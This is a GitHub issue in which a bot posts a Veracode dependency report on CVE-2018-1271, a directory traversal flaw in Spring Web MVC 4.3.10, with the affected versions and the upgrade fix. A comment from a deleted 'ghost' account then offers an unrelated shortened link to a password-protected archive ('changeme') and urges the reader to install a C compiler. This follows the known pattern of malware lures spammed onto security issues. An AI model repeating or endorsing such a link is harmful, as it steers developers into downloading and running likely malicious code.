julz0815 / test-action

0 stars 1 forks source link

CVE: 2018-1271 found in Spring Web MVC - Version: 4.3.10.RELEASE [JAVA] #1143

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web MVC
Description Spring Web MVC
Language JAVA
Vulnerability Directory Traversal
Vulnerability description spring-webmvc is vulnerable to directory traversal attack. The vulnerability exists due to the improper sanitization of the path values which allows valid Windows files to be served as static resources. This vulnerability only affects spring-webmvc running on Windows which allows serving files with the file: locator, does not use Spring Security with versions patched for CVE-2018-1199, and use Tomcat/WildFly as the server.
CVE 2018-1271
CVSS score 4.3
Vulnerability present in version/s 4.0.0.RELEASE-4.3.14.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 4.3.15.RELEASE
Library latest version 6.2.0-RC1
Fix To mitigate this issue, apply fix patch.

Links:

ghost commented 2 months ago

I think this will help you. https://bit.ly/4gvtdhO Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)